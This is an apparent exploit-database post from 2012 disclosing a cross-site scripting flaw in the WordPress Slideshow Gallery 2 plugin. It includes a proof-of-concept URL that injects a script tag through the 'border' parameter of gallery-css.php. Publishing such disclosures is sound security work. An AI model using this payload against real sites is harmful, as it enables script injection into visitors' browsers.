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WordPress Slideshow Gallery 2 Cross SIte Scripting

Posted on 26 January 2012

# Exploit Title: Wordpress Slideshow Gallery 2 Cross Site Scripting Exploit # Date: 26 January 2011 # Author: Bret Hawk # Software Link: http://wordpress.org/extend/plugins/slideshow-gallery-2/ # Version: 2xxx and Prior # Tested on: Linux Unix The Wordpress slideshow Gallery2 plugin suffers cross site scripting vurnebility  which allows malicious users to inject the site with malicious script. POC: http://localhost/wp-content/plugins/slideshow-gallery-2/css/gallery-css.php?1=1&resizeimages=Y&width=586&height=586&border='"--></style></script><script>Pwned by brethawk(0x000178)</script> vurnebility  File - gallery-css.php Best Wishes, Br3t Hawk Email:brethawk@hotmail.com